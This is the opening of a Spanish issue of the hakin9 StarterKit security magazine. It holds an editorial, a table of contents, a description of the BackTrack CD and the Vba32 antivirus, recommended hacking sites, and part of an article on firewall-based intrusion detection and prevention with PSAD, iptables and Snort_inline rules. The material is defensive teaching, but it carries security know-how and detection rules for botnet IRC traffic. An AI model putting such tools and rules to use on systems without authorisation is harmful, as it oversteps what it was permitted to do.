hakin9 Starterkit

4
Queridos lectores
El mundo TI siempre era para mí un mundo desconocido,
pero también un mundo mágico.
Quería saber algo más de él pero siempre tenía
miedo. Entrar en el mundo TI me resultaba dificil, pero
poco a poco entré y me absorbó. El miedo ha cambiado
en respeto...
Iniciamos un nuevo proyecto. Cada tres meses aportamos
nuevas informaciones y artículos para principiantes.
Para todo el mundo interesado en TI, para éstos que
poseen conocimientos básicos en computación y quieren
saber más, pero no saben por dónde empezar...
Queremos crear una revista junto con nuestros lectores.
Estamos abiertos a vuestras propuestas, porque
sois vosotros quienes conocéis mejor vuestras necesidades.
Siempre invitamos a todos que deseen ser nuestros
autores, correctores o simplemente tienen propuestas de
cómo mejorar hakin9 StarterKit.
En el primer número publicamos los mejores articúlos
para principiantes de hakin9 y...mucho más.
Hablamos del uso de cortafuegos (firewalls) y su
importancia en la política de seguridad. Presentamos las
técnicas de ADS y ofuscación, primera es de ocultación
de un documento en otro y segunda de encubrimiento
de código fuente de la información...y una crítica de
Windows Vista y de su concepto de seguridad. Damos
también unos consejos de cómo usar vulnerabilidades y
fallos del sistema para hacerlo más seguro en el futuro.
Que más puedo decir... ¡Os invito a la lectura!
Natasza Balwierczak
Redactora Jefa de hakin9 StarterKit
www.hakin9.org/es
Contenido de CD 6
Monika Szymańska, David Santamaria
Este ejemplar de hakin9 Starterkit, viene, con la
distribución hakin9.live, basada en Backtrack 2.0
CD y completada con utiles herramientas y plug-ins.
BackTrack 2.0 es la distribución de Linux dedicada al
testeo de redes mejor valorada en la actualidad.
Mucho más que cortafuegos 10
Jess García
Los cortafuegos siguen evolucionando. Debido al
importante papel que juegan en la infrastructura de
una red son quizás el lugar adecuado para implementar
ciertos controles y otros tipos de funciones
que no se relacionan estrictamente con el filtrado de
tráfico convencional.
Ofuscación para principiantes 18
Laic Aurelian
De acuerdo con Wikipedia ofuscación es encubrir el
significado de una comunicación haciéndola más confusa
y difícil de interpretar. Por eso el Código ofuscado
es un código fuente intencionadamente transformado
para que sea muy difícil de leer y comprender.
Firewall con 2 canales de Internet 24
Samuel Diaz
Los cortafuegos siguen evolucionando. Debido al
importante papel que juegan en la infrastructura de
una red son quizás el lugar adecuado para implementar
ciertos controles y otros tipos de funciones
que no se relacionan estrictamente con el filtrado de
tráfico convencional.
Seguridad en Windows Vista 28
Oscar Martínez Pérez
El coloso Microsoft, que lanzó en Octubre del 2001
Windows XP, vuelve a la carga con una nueva versión,
de su sistema operativo Windows, por el que ha
recibido durante años, críticas y alabanzas de todo
tipo. Según Microsoft con esta nueva apuesta, lanza
un sistema operativo, mucho más sencillo, seguro y
divertido, pero sobretodo seguro.
Inseguridad de la información 34
Armando Carvajal
La inseguridad de la información es el reto permanente
del encargado de la seguridad de la información.
Cada nueva vulnerabilidad, cada nueva falla
identificada establece un reto, no solamente para
reparar los daños y la falla, sino para comprender
la mente del intruso, los elementos que intervienen
en la falla e identificar la evidencia de los hechos
materializados.

El valor forense de los honeypots 42
Armando Carnajal
Los honeypots se muestran en el mundo de la informática
como la trampa perfecta para todos aquellos
posibles atacantes, su labor radica en simular
ser vulnerables o debiles al ataque, captando toda
la información de sus agresores una vez diagnosticado
al agresor, advierte al administrador del sistema,
antes de dañar completamente la red.
Vulnerabilidades de WEP y WPA 54
José Luís Picazo Martínez
Las redes inalámbricas Wifi, se han convertido
en una necesidad para los usuarios domésticos
de hoy en día. Su uso masivo ha provocado que
con la misma rapidez con la que se han intentado
proteger...
Digitalización
de Documentos Certificada 58
Roger Carhuatocto
El artículo explica cómo diseñar y construir una aplicación
que convierta documentos en papel a formato
digital con la garantía de que los documentos digitales
sean copia fiel a...
Doctor Jekyll
y Mr. Hyde versión NTFS 64
Laic Aurelian
Este artículo trata sobre Alternate Data Streams.
Comparándola con la estaganografía clásica, esta
técnica oculta documentos asociándolos como un
stream en otro documento...
USB Payload – el gadget
más potente del agente 007 70
Yago F. Hansen
Las herramientas de auditoría y enumeración que
se incluyen en las distribuciones del tipo USB
payload no son nada nuevo, en todo caso actualizaciones.
Lo novedoso de este sistema, por lo
tanto no es el contenido, sino la forma de empaquetarlo
utilizando...
En el proximo número 82
Aquí presentamos artículos para proximo numero de
Hakin9 StarterKit.
está editado por Software-Wydawnictwo Sp. z o.o.
Dirección: Software-Wydawnictwo Sp. z o.o.
ul. Bokserska 1, 02-682 Varsovia, Polonia
Tel: +34 917 610 987, Fax: +48 22 427 36 39
www.hakin9.org/es
Producción: Marta Kurpiewska marta.kurpiewska@software.com.pl
Distribución: Katarzyna Chauca katarzyna.chauca@software.com.pl
Redactor jefe: Natasza Balwierczak natasza.balwierczak@hakin9.org
Redactor adjunto: Monika Szymanska monika.szymanska@hakin9.org
Preparación del CD: Rafał Kwaśny
DTP Manager: Robert Zadrożny robert.zadrozny@software.com.pl
Composición: Ewa Turowska ewa.turowska@software.com.pl,
Jarosław Zakwrzewski jaroslaw.zakrzewski@software.com.pl
Betatesters: Edison Josue Diaz, Francisco Jesus Gómez, Jose Luis
Nunez Montes, Juan Carlos Montejo Lopez, Jaume Mayor
Corrección: Evangelina Jacob, Juan Carlos Montejo López,
Daniel Perez Clavero
Publicidad: adv@software.com.pl
Suscripción: suscripcion@software.com.pl
Diseño portada: Agnieszka Marchocka
Las personas interesadas en cooperación rogamos
se contacten: es@hakin9.org
Si estás interesado en comprar la licencia para editar nuestras revistas
contáctanos:
Katarzyna Chauca
e-mail: katarzyna.chauca@software.com.pl
tel.: +34 917 610 987
fax: +48 22 427 36 39
Imprenta: 101 Studio, Firma Tęgi
Distribuye: coedis, s.l.
Avd. Barcelona, 225
08750 Molins de Rei (Barcelona), España
La Redacción se ha esforzado para que el material publicado en la revista
y en el CD que la acompaña funcione correctamente. Sin embargo, no se
responsabiliza de los posibles problemas que puedan surgir.
Todas las marcas comerciales mencionadas en la revista son propiedad de
las empresas correspondientes y han sido usadas únicamente con fines
informativos.
¡Advertencia!
Queda prohibida la reproducción total o parcial de esta publicación
periódica, por cualquier medio o procedimiento, sin para ello contar
con la autorización previa, expresa y por escrito del editor.
La Redacción usa el sistema de composición automática
Los diagramas han sido elaborados con el programa
de la empresa
El CD incluido en la revista ha sido comprobado con el programa
AntiVirenKit, producto de la empresa G Data Software Sp. z o.o.
La revista hakin9 StarterKit es editada en 3 idiomas:
ES PL EN
Advertencia
¡Las técnicas presentadas en los artículos se pueden usar SÓLO
para realizar los tests de sus propias redes de ordenadores!
La Redacción no responde del uso inadecuado de las técnicas
descritas. ¡El uso de las técnicas presentadas puede provocar la
pérdida de datos!

kit
Contenido del CD
Este ejemplar de hakin9 Starterkit, viene, con la
distribución hakin9.live, basada en Backtrack
2.0 CD y completada con utiles herramientas
y plug-ins. BackTrack 2.0 es la distribución de Linux
dedicada al testeo de redes mejor valorada en la actualidad.
La platforma de análisis arranca desde el CD sin
necesitar ningún tipo de instalación y en minutos está
lista para ser usada sin restricciones.
Para empezar y usar BackTrack 2.0 hakin9.live no
tienes más que arrancar el equipo con el CD. Para
utilizar las aplicaciones comerciales que hemos conseguido
para los lectores de hakin9 no necesitas cargar
la distribución : se encuentran separadas en la carpeta
Applications y están accesibles directamente.
El CD en este mes contiene:
40 tutoriales sobre Visual Basic
Presentamos para nuestros lectores 35 video tutoriales
sobre Visual Basic.
Visual Basic constituye un IDE (entorno de desarrollo
integrado o en inglés Integrated Development
Enviroment)que ha sido empaquetado como un programa
de aplicación, es decir, consiste en un editor de código
(programa donde se escribe el código fuente), un
depurador (programa que corrige errores en el código
fuente para que pueda ser bien compilado), un compilador
(programa que traduce el código fuente a lenguaje
de máquina), y un constructor de interfaz gráfica o GUI
(es una forma de programar en la que no es necesario
escribir el código para la parte gráfica del programa,
sino que se puede hacerlo de forma visual).(wiki)
(www.dragonjar.us)
VirusBlokAda ( Vba32)
Vba32 es una eficaz y rápida herramienta para detectar
y neutralizar viruses informáticos, gusanos
de correo, troyanos y otro malware (backdoors, adware,
spyware, etc). Vba32 proporciona protección
de alto rendimiento a sus ordenadores personales,
estaciones de trabajo y servidores de redes área local.
Vba32 posee un poderoso analizador heurístico
que le protege tanto de nuevos virus como de sus
mutaciones.Una considerable base de programas
maliciosos conocidos y las actualizaciones regulares
del antivirus le proporcionan la más eficaz protección
de su computadora.
Soporte técnico
El soporte es proporcionado por VirusBlockAda Ltd.
License #01019/0026140, 2006/06/30, perteneciente al
State Centre Of Information Security de la República de
6 www.hakin9.org/es
Bielorrusia. La licencia posibilita al titular a proporcionar
protección técnica de los datos, incluyendo el uso de métodos
criptográficos y el derecho de uso de firma digital.
Kalvarijskaja Str., 17, 611
220004 Misk, Bielorrusia
Tel .: (+375 17) 226-62-85 – Departmento de Ventas
Tel .: (+375 17) 226-85-55 – Departmento de Programación.
e.mail: support-en@anti-virus.by
Página Web: http://www.anti-virus.by/
Instalando Vba32
• Comenzando la Instalación
• Inicie el fichero de instalación que recibió de su proveedor
o que descargó del sitio de desarrollo.
• Atención: Si utiliza la versión de Vba32 para Windows
NT/2000/XP/2003/Vista asegúrese de que ha iniciado
sesión como administrador en el equipo.
• Pantalla de bienvenida
Presione SIGUIENTE para continuar la instalación. Presione
VER NOVEDADES para conocer los cambios en la
versión del producto.
• Selección del Tipo de instalación
• Puede elegir entre tres tipos de instalación: típica, completa
y Personalizada.
• Típica: Contiene un set de componentes estándar
que proporcionan protección antivirus efectiva para
su equipo. Está recomendada para la mayoría de los
usuarios.
• Completa: Permite instalar todos los componentes de
Vba32. Está recomendada para obtener los mejores
resultados.
• Personalizada: Permite elegir los componentes de
Vba32 a instalar. Está recomendada para usuarios
avanzados.
Presione Examinar para seleccionar la carpeta destine
de la instalación. Presione siguiente para continuar la
instalación.
• Seleccionando las Características
Si ha seleccionado el tipo de instalación Personalizado,
se le mostrará una pantalla con la lista de componentes.
Por defecto, el número de componentes corresponde a
los de la instalación Típica.
• Configurando Vba32

Si no puedes leer el contenido del CD y no es culpa de un daño
mecánico, contrólalo en por lo menos dos impulsiones de CD.
En caso de cualquier problema con CD rogamos
escriban a: cd@software.com.pl
www.hakin9.org/es
7

kit
Vba32 puede ser configurado en la siguiente pantalla:
• Iniciar Vba32 Loader al Inicio de Windows - El programa
se cargará automáticamente al iniciar el sistema.
• Crear Iconos en el Escritorio – El icono de Vba32
Loader aparecerá en el Escritorio.
• Mostrar Componentes de Vba32 en el Menú de Inicio
– Se creará el grupo Vba32 en el menú de Inicio.
Además, puede especificar la localización del fichero
llave de registro de Vba32. Presione el botón Examinar y
especifique la ruta al fichero vba32.key en el cuadro de
diálogo. Si no sabe dónde se encuentra, consulte a su
proveedor. Atención: ¡Sin el fichero llave, el programa
funcionará en modo demostración! Sólo se le permitirá
actualizar el producto una vez y algunas características
no estarán disponibles.
• 6- Preparándose para instalar la aplicación
• Presione el botón SIGUIENTE para comenzar a instalar
los ficheros. Presione ATRÁS para cambiar las
opciones anteriores o presione CANCELAR para salir
del programa de instalación.
• 7- La instalación a terminado correctamente
• Presione el botón FINALIZAR para completar la instalación.
Iniciando Vba32 Por primera vez
Tras instalar Vba32 y reiniciar el equipo, verá el icono
del Vba32 Loader en la barra de tareas. Si no hay icono
significa que usted ha desactivado la carga automática al
inicio del sistema durante la instalación; o puede haber
instalado el programa incorrectamente (en este caso se
le recomienda reinstalarlo). Como siguiente paso, le recomendamos
que actualice el programa para obtener los últimos
módulos antivirus. Simplemente tiene que hacer clic
derecho en el icono de Vba32 Loader en la barra de tareas
y seleccionar ACTUALIZAR en el menú desplegable. Por
defecto se descarga de http://anti-virus.by/update/. Puede
utilizar direcciones alternativas de la lista del programa o
especificar cualquier ruta de actualización válida.
• Cuando haya finalizado la actualización podrá efectuar
su primer análisis. Recomendamos analizar todos
los discos de su equipo. Seleccione Scanner del menú
desplegable o presione el botón Scanner en la pantalla
principal del Vba32 Loader. Después presione >
en la barra de herramientas para comenzar el análisis
antivirus. Cuando el análisis haya finalizado, verá los
resultados en la ventana del Vba32 Scanner.
Componentes de Vba32
Vba32 Antivirus es un conjunto de componentes que proporcionan
protección a su computadora frente a programas
maliciosos y virus informáticos. Dependiendo de la versión
que haya adquirido y de los componentes que haya instalado,
pueden encontrarse los siguientes módulos:
8 www.hakin9.org/es
• Vba32 Loader es el panel de control principal de
Vba32. Proporciona seguimiento de los módulos
del antivirus, lanza el Scanner de Vba32 y modifica
los parámetros de monitorización. Véase también
interfaz del Programa para aprender más sobre las
funciones del Vba32 Loader.
• Vba32 Monitor proporciona protección permanente
de los ficheros existentes así como de los
nuevos ficheros obtenidos de la red local y otras
unidades, descargados de Internet o recibidos vía
E-mail. Véase Protección Activa de ficheros para
aprender más sobre las funciones del vba32 Monitor.
• Vba32 Scanner proporciona el análisis bajo demanda
de las unidades, carpetas y ficheros. Proporciona
sencillas formas de presentación de los resultados del
análisis. Véase Análisis de ficheros Bavjo Demanda
para aprender más sobre las funciones del Vba32
Scanner.
• El Windows/DOS Console Scanner está diseñado para
el análisis antivirus de discos, carpetas y ficheros usando
la línea de comandos. Véase Windows/DOS Console
Scanner para aprender más sobre estas funciones.
• La Extensión del Menú contextual de Windows Explorer
permite analizar ficheros específicos desde el
menú contextual del Windows Explorer. Véase Menú
contextual En Windows Explorer para aprender más
sobre estas funciones.
• El Antivirus Mail Filter analiza mensaje de e-mail recibidos
mediante los protocolos POP3 e IMAP4 antes
de ser recibidos por los clientes de correo. Véase
Vba32 Mail Filter para más información.
• El Plugin Antivirus para The Bat! está diseñado para
proteger el cliente de correo The bat!, versión 1.61 y
superiores. Véase Módulo The Bat Vba32 para más
información.
• El Plugin Antivirus para Microsoft Outlook está
diseñado APRA proteger los clientes de correo
Microsoft Outlook y Microsoft Exchange Client.
Véase Vba32 Outlook Plugin para más información.
• El Antivirus Script Filter protege Microsoft Internet
Explorer, Microsoft Outlook Express y cualquier otra
aplicación que utilice Microsoft Windows Scripting
host. Véase Antivirus Internet Protection para más
información.
• Antidialer – Proporciona protección contra intentos no
autorizados de creación de conexiones a números de
teléfono desconocidos. Véase Vba32 Antidialer para
más información.
• Antivirus Quarantine – almacena los ficheros sospechosos
e infectados que son detectados por los plugins
de Vba32. véase Antivirus Quarantine para más
información.
Atención: Keyfile para programa VirusBlokada va a funcionar
después 5 de Marzo. l

Páginas recomendadas
Una especie de portal para la gente a que
le gusta la informática y la seguridad. Si te gusta
este mundo, te gustará elhacker.net.
http://www.elhacker.net
Un lugar de encuentro para todos interesados
en temas de seguridad
www.daboweb.com
Aquí encontrarás todo lo que debes saber
www.segu-info.com.ar
Web especializada en artículos técnicos sobre
Linux. Aquí encontrarás las últimas noticias sobre
Linux y Software Libre, foros.
www.diariolinux.com
CyruxNET – allí encontrarás la información
detallada sobre las técnicas hack más populares.
http://www.cyruxnet.org
Hack Hispano, comunidad de usuarios en la
que se tratan temas de actualidad sobre nuevas
tecnologías, Internet y seguridad informática.
http://www.hackhispano.com
Tecnología, informática e Internet. Allí encontrarás
enlaces, foros, fondos de escritorio y una biblioteca
repleta de artículos interesantes...
http://www.hispabyte.net
Seguridad0 es un magazine gratuito de seguridad
informática. Tiene una periodicidad semanal,
aunque se anaden noticias a diario.
http://www.seguridad0.com
Sitio de noticias que brinda la más variada información
en cuanto al mundo de los móviles,
enlaces, contactos, y mucho más.
www.diginota.com
Un espacio libre para compartir: descargas,
software, programas oscuros, dudas, noticias,
trucos... y más cosas a ritmo de blues.
http://www.viejoblues.com
Indaya teaM fue creada por un grupo de personas
amantes de la informática para ayudar
a todos los que se interesan por la informática.
http://www.indaya.com
DelitosInformaticos.com revista digital de información
legal sobre nuevas tecnologías.
www.delitosinformaticos.com
Páginas recomendadas
Si tienes una página web interesante y quieres que la presentemos en
nuestra sección de “Páginas recomendadas” contáctanos: es@hakin9.org

kit
Mucho más
que un cortafuegos
Jess Garcia
Adicionalmente, los cortafuegos tuvieron
que adaptarse a las nuevas tecnologías
y amenazas que el siglo 21 trajo consigo.
Si echamos un vistazo a los cortafuegos comerciales
más populares, podremos observar que la
mayoría de ellos incorporan una serie de características
que no están relacionadas con el papel
que desempeña un cortafuegos como dispositivo
de filtrado de tráfico red convencional: Red Privada
Virtual (VPN), Autorización de Certificados,
Inspección de Contenido, Deteccion y Prevención
de Intrusos, soporte para redes virtuales de área
local (VLAN), virtualización y un largo etcétera.
Estas características han sido incluidas durante
el paso de los años para proporcionar más flexibilidad
a las compañías que necesitan hacer uso
de cortafuegos escalables, fáciles de administar
y eficaces.
Sin embargo, no es muy común ver estas
características implementadas en cortafuegos
Open Source o de código abierto, como por ejemplo
Iptables en sistemas GNU/Linux, o PF (Packet
Filter) en OpenBSD, ya que siguen un modelo diseño
más abierto. Es decir, cuando necesitas una
funcionalidad extra la debes que añadir tú mismo.
Esto se puede realizar sin demasiado esfuerzo y
logrará extender las capacidades de tu cortafue-
10 www.hakin9.org/es
Los cortafuegos siguen
evolucionando. Debido al
importante papel que juegan en
la infrastructura de una red son
quizás el lugar adecuado para
implementar ciertos controles
y otros tipos de funciones que
no se relacionan estrictamente
con el filtrado de tráfico
convencional.
gos para suministrar características como por
ejemplo las mencionadas anteriormente.
En este artículo hablaremos sobre algunas de
estas funcionalidades extra y de cómo aplicarlas
en tu cortafuegos de manera un tanto especial.
Detección de Intrusos
La Detección de Intrusos es el arte de detectar
una actividad inapropiada en la red y en el sistema.
En pocas palabras, y según un escenario
más habitual, esto significaría que cuando un
usuario malicioso ataca los sistemas de tu red,
éste sería detectado al instante.
Una evolución del concepto de la detección
de intrusos es la prevención de intrusos, que
En este artículo aprenderás
• Las tecnologías de seguridad adicional que
pueden emplearse en tu cortafuegos.
Lo que deberías saber
• Deberías haber leído el artículo de Antonio Merola
& Arrigo Triulzi sobre las bases del filtrado
de paquetes.

además de detectar un ataque, aplica
una metodología para detenerlo. Obviamente,
la labor de prevención es
siempre mejor que la de detección,
ya que solamente se podría prevenir
un ataque cuando se tiene la certeza
de que una actividad particular es
maliciosa.
Esta es una tarea difícil, y por eso
los sistemas de prevención de intrusión
(IPS) no son tan populares como
los sistemas de detección de Intrusos
(IDS), especialmente cuando no se
tiene la certeza de que la actividad
inapropiada es maliciosa.
Existen dispositivos especializados,
sistemas de detección de
intrusos y sistemas de prevención
de intrusos que están especialmente
diseñados para llevar a cabo dichas
funciones. Sin embargo, ¿no sería
genial que pudiéramos implementarlas
en nuestros propios cortafuegos?
Pues bien, es posible.
Actualmente los cortafuegos comerciales
más populares incluyen capacidades
IDS e IPS, desde básicas
hasta avanzadas.
También podemos encontrar aplicaciones
de código abierto que nos
permitirán obtener estas funcionalidades
extra, aunque habrá que trabajar
bastante para que los resultados obtenidos
se adecuen a los objetivos que
perseguimos.
Empezaremos pues añadiendo
funcionalidades de IDS a nuestro
dispositivo. Existen muchas maneras
de implementar la detección de
intrusos. La más obvia consiste en
emplear software de deteccion de intrusos.
Con respecto a esto, estamos
de suerte, ya que una de las mejores
aplicaciones IDS es Open Source o
de código abierto. Se llama Snort [1] y
puede que hayas oído hablar de él, ya
que se trata de un software bastante
popular y utilizado con frecuencia. El
tipo principal de detección de intrusiones
que hace Snort es el denominado
basada en firmas, osea, basado en
el tipo de tráfico de red característico
que genera un ataque en concreto.
Sin embargo, empleando un IDS
no es la única forma de conseguir
esto. Puede que la mayoría de los
administradores de cortafuegos no
se imaginen que dichos dispositivos
constituyen una gran fuente de datos
que se puede utilizar en la labor de detección
de intrusos. ¿Por qué razón?
Bueno, los cortafuegos son dispositivos
que cumplen con las políticas de
filtrado de la organización. Osea, un
conjunto de reglas que establecen lo
que está permitido y lo que no a nivel
de la capa de red.
Cuando el dispositivo está configurado
apropiadamente, el cortafuegos
no permitirá ningún tipo de tráfico que
no sea necesario y además, registrará
todas las violaciones de dicha política,
suministrando posteriormente los
datos de la presunta intrusión. Ahora
bien, se realiza una intrusión, muchas
veces se debe a la violación de la política
de filtrado de la organización.
Como por ejemplo, cuando un
atacante comienza a escanear la
red interna, trata de comprometer un
servidor o intenta conectarse a un
canal de IRC en un servidor remoto.
Así pues, estas actividades serán
típicamente detectadas y se registrarán
como tráfico inapropiado por
un cortafuegos que esté configurado
correctamente.
Asimismo, puede que también te
preguntes, ¿Qué herramientas puedo
usar para realizar la monitorización del
registro del cortafuegos? Pues bien,
existen un buen montón de herramientas
[2] que pueden realizar la monitorizacion
de los registros del cortafuegos.
Las hay desde los más simples, como
por ejemplo el analizador de registros
de IPtables, fwlogwatch que funciona
con Netfilter/IPtables, Hatchet que fue
diseñado para el cortafuegos personal
de OpenBSD, hasta los más sofisticados
motores de administración de
seguridad de la Información, como por
ejemplo OSSIM, cuyos registros del
cortafuegos se pueden interrelacionar
con otros registros de seguridad, como
por ejemplo los registros sistema
o de la red.
PSAD
Existen más herramientas para sistemas
GNU/Linux que están incluso
más orientadas a la detección de
intrusos que las herramientas mencionadas
anteriormente. Este es
www.hakin9.org/es
Cortafuegos
el caso de PSAD [3], que emplea
los archivos de registro de Netfilter/
IPtables de los sistemas GNU/Linux
y es capaz de detectar escaneos de
red, firmas de Snort, reconocimentos
pasivos del sistema, etc.
Adicionalmente, si combinamos
PSAD con fwsnort [4], se pueden
incluso emplear dichas firmas a nivel
de aplicación, gracias a la capacidad
de las cadenas de Netfilter/IPtables.
La instalación de PSAD es muy
simple. Podemos encontrar paquetes
de la aplicación para la mayoría
de distribuciones de sistemas GNU/
Linux.
PSAD funciona monitorizando
los mensajes que IPtables envía al
registro de sistema Así pues, habrá
que configurarlo para que registre
los mensajes emitidos por el kernel
en la ruta /var/lib/psad/psadfifo y el
demonio de PSAD pueda recibirlos:
echo -e 'kern.info\t|/var/lib/psad/
psadfifo' >> /etc/syslog.conf
Acto seguido, reiniciaremos Syslog:
/etc/init.d/sysklogd restart
A partir de este momento será posible
guardar los mensajes emitidos
por Netfilter/IPtables en el registro
del sistema pero ¿qué es lo que
realmente se está registrando?
Podemos consultar la configuración
de IPtables mediente la ejecución
del comando siguiente: iptables -
L -vn. Observaremos entonces que
algunas líneas contienen la palabra
LOG.
Por defecto GNU/Linux no registra
paquetes sueltos o rechazados
cuando las políticas DENEGAR o
RECHAZAR están configuradas de
forma predeterminada (las políticas
por defecto se establecen con el
comando iptables -P). Así pues,
es recomendable preparar un script
con los comandos adecuados para
que se ejecute de forma automática
cada vez que se inicie la aplicación
(Listado 1).
Después de configurar el registro
del cortafuegos le toca el turno a
PSAD. La configuración de PSAD
11

kit
no es complicada, incluso con el
montón de opciones entre las que
podemos elegir. Tan solo hay que
editar el archivo /etc/psad/psad.conf
y especificar la dirección IP, el nombre
del host, la red local y poco más.
Luego habrá que reiniciar el demonio
mediante el comando siguiente.
/etc/init.d/psad start
Realizado este paso, tan sólo hemos
de esperar que nos lleguen los mensajes
de alerta, bien por correo electrónico,
bien a través de los archivos
de registro de PSAD almacenados
en /var/log/psad. Además, se pueden
utilizar aplicaciones de registro
adicionales tales como swatch [5],
para monitorizar los archivos de
registro cuando deseemos realizar
acciones sofisticadas después de
que aparezca la alerta. Se puede
decir que poseemos un sencillo
sistema de detección de intrusos en
acción, ¿no?
Hay algo importante que es necesario
tener en cuenta en el escenario
donde nos movemos. Cuando
empleamos este tipo de herramientas
en el entorno hostíl del Internet
de hoy en día, recibiremos miles de
ataques desde la red externa que
podrían llevarnos muy pronto ignorar
los enviadas por PSAD. Así pues,
es recomendable observar nuestro
tráfico saliente. Esta es una estrategia
conocida como Detección de
Extrusión [6].
En el entorno actual, donde los
ataques dirigidos a clientes y las
botnets, ejércitos de computadores
comprometidos por usuarios maliciosos
que realizan ataques de denegación
de servicio o envian correo
basura constituyen una amenaza
constante, será más recomendable
examinar nuestro tráfico de red saliente
mejor que el entrante, ya que
el proceso será mas silencioso y obtendremos
menos falsos positivos.
Prevención de intrusos
Nos centraremos ahora en la prevención
de intrusos. Lo primero que
debemos mencionar es que la prevención
de intrusos no constituye un
reemplazo para la detección de intrusos,
sino más bien un complemento.
Ninguna tecnología de seguridad es
perfecta, y la prevención de intrusos
no es una excepción. Sin embargo,
la combinación de diferentes técnicas
de detección y prevención de host
y de red proporcionan resultados
óptimos (este enfoque de defensa
multicapa denominado Defensa en
Profundidad, demostró que era la
mejor manera de proteger la infraestructuras
de sistema y red actuales).
Además, no hay que olvidarse del
viejo dicho La prevención es idea,
pero la detección es obligación. Más
tarde o más temprano tu equipo o tu
red será atacada por usuarios maliciosos,
sin embargo, lo que no te
puedes permitir es no estar informado
acerca de ello.
El siguiente aspecto que podemos
preguntarnos es acerca del sentido
que tiene que un IPS y un cortafuegos
se combinen en el mismo dispositivo.
La respuesta es porque comparten un
montón de características comunes;
en el caso de cortafuegos, las reglas
deben aplicarse a los puertos, protocolos
y estado de conexiones mientras
que en el caso de los IPS, estas
reglas deben aplicarse al contenido y
características de los paquetes.
Listado 1. Conjunto de configuraciones
iptables -N LOG_DROP # Creates a new chain called LOG_DROP
iptables -A LOG_DROP -j LOG
# Packet will be logged first in the LOG_DROP chain
iptables -A LOG_DROP -j DROP
# Packet will then be dropped in the LOG_DROP chain
[...] # Your INPUT / FORWARD ruleset goes here
iptables -A INPUT -j LOG_DROP
# At the end of the INPUT and FORWARD rulesets the
iptables -A FORWARD -j LOG_DROP
# packet is LOG_DROPped (if not previously allowed)
12 www.hakin9.org/es
Snort_inline
Ahora bien, ¿qué herramienta de
código abierto podemos emplear
para la prevención de intrusos?
La respuesta es Snort_inline, una
extensión de Snort relacionada con
Netfilter/IPtables para tratar paquetes
identificados como maliciosos
por el motor de Snort.
Si estás interesado en cómo trabajan
juntos Netfilter/IPtables, Snort
y Snort_inline, lo mejor que puedes
hacer es descargar Honeywall [7],
un CD autoarrancable utlizado principalmente
en redes Honeynet. Para
obtener más información sobre las
Honeynets visita la página del proyecto
Honeynet [8]. Si deseas emplear
Snort_inline para proyectos de
desarrollo, descárgalo de la página
oficial de Snort e instálalo mediante
el comando siguiente:
./configure --enable-inline ;
make ; make install
Las opciones de configuración de
Snort_inline se almacenan en el
archivo snort_inline.conf, que define
su comportamiento general.
En el mismos directorio que el
mencionado archivo de configuración
encontrarás un buen número
de reglas que identifican ciertos
modelos de tráfico malicioso. Vamos
a examinar una de ellas:
drop tcp $HOME_NET any ->
$EXTERNAL_NET 6666:7000
(msg:"CHAT IRC channel join";
rev:2; sid:1729;
classtype:misc-activity; content:
"|4A 4F 49 4E 20 3A 20 23|"; nocase;
flow:established,to_server;)
La regla rechazará cualquier paquete
que pertenezca a un intento de
conexión a un canal de IRC desde
nuestra organización hacia Internet.
Hoy en dia, aplicar esta regla en
nuestra organización tiene mucho
sentido. ¿Por qué? Simplemente
porque las botnets emplean el mecanismo
de conexión a servidores
de chat IRC para controlar los hosts
comprometidos. Podría no ser posible
aplicar esta regla de manera universal

en tu organización al completo cuando
los usuarios pueden emplear servicios
de chat y mensajería, pero definitivamente
tendrá sentido aplicarla en
redes compuestas solamente por
servidores, ya que estos no deberían
utilizar estos servicios de chat.
Puede que nos haya sorprendido
la forma con la que Snort_inline es
capaz de ver la carga útil de estos paquetes.
Bueno, el mecanismo es algo
diferente al de PSAD. Sin embargo,
en este caso también se emplearán
las capacidades del potente motor
Netfilter/IPtables.
Netfilter/IPtables ofrece la posibilidad
de definir reglas diferentes para
el tráfico de red, tales como ACCEPT,
DROP, QUEUE, o RETURN. La regla
QUEUE, que depende del kernel, denominada
ip_queue es un mecanismo
traslada paquetes de la pila para hacer
cola en el espacio de usuario donde,
en este caso, Snort _ inline los recibe
los procesa. Será posible entonces
recibir de nuevo estos paquetes en
el kernel a través de Snort _ inline
especificando la accion que hay que
realizar con los paquetes (como AC-
CEPT o DROP).
La regla se realizará al inspeccionar
los paquetes gestionados por
Netfilter/IPtables y al aplicar la configuración
de las reglas para cada uno
de ellos. Una característica importante
de Snort_inline es que permite modificar
los paquetes antes de inyectarlos
de nuevo en el kernel. Una regla que
podría realizar tal acción sería:
alert tcp any any any 80
(msg: "tcp replace"; content:
"GET"; replace:"BET";)
Esto sustituiría el método GET con la
palabra BET, incapacitando supuestamente
el uso malicioso del protocolo
HTTP.
Esta funcionalidad es útil para
inutilizar un ataque sin romper la
conexión, porque cuando se rechaza
un paquete de una sesión TCP, dicha
sesión no puede conntinuar, lo que
alarmará al atacante de la presencia
de un IPS. Sin embargo, este método
no es infalible y funcionará solamente
con atacantes inexpertos.
Es importante mencionar lo que
se denominan falsos positivos. Un
falso positivo es una falsa alarma. En
el mundo de la detección de intrusos,
los falsos positivos constituyen un problema
porque confunden (y muchas
veces sobrecargan) el análisis del
tráfico de red.
En el mundo de la prevención de
intrusos, los falsos positivos son mucho
más peligrosos, ya que un falso
positivo significa que se rompió una
conexión autorizada. ¡Imagina lo que
pasaría si una conexión concreta es
crítica!
Es por eso que la configuración del
conjunto de reglas debe especificarse
con sumo cuidado y por ello, el valor
principal de un IPS está basado en la
exactitud de sus firmas. La verdad es
que la iniciativa en este caso pertenece
a los fabricantes de dispositivos
IPS, que suministran el servicio de actualización
y mantenimiento de reglas
a sus clientes.
Desgraciadamente, la comunidad
Open Source no mantiene actualmente
reglas de IPS eficaces, con
excepción de los conjuntos de reglas
suministradas por el proyecto Honeynet.
Además, no se actualizan periódicamente,
solo con la salida de una
nueva versión del CD Honeywall.
Por otro lado, las reglas de Snort
son accesibles libremente, sin embargo
están orientadas a los IDS y cuando
se convierten a firmas para IPS, el
riesgo de que se produzca un ataque
de denegación de servicio aumenta.
Honeypots
En este punto viste cómo emplear tu
cortafuegos para detectar intrusiones
e incluso prevenirlas.
Todavía hay infinidad de cosas que
puedes hacer con tu cortafuegos para
aumentar la seguridad de tu organización.
Una de ellas es Honeypotting.
De acuerdo con la definición de
los miembros del grupo de noticias
de Honeypots en Securityfocus [9],
un Honeypot es un recurso cuyo valor
ha sido atacado o comprometido. Esta
amplia definición deja espacio para un
gran número de tipos de Honeypot
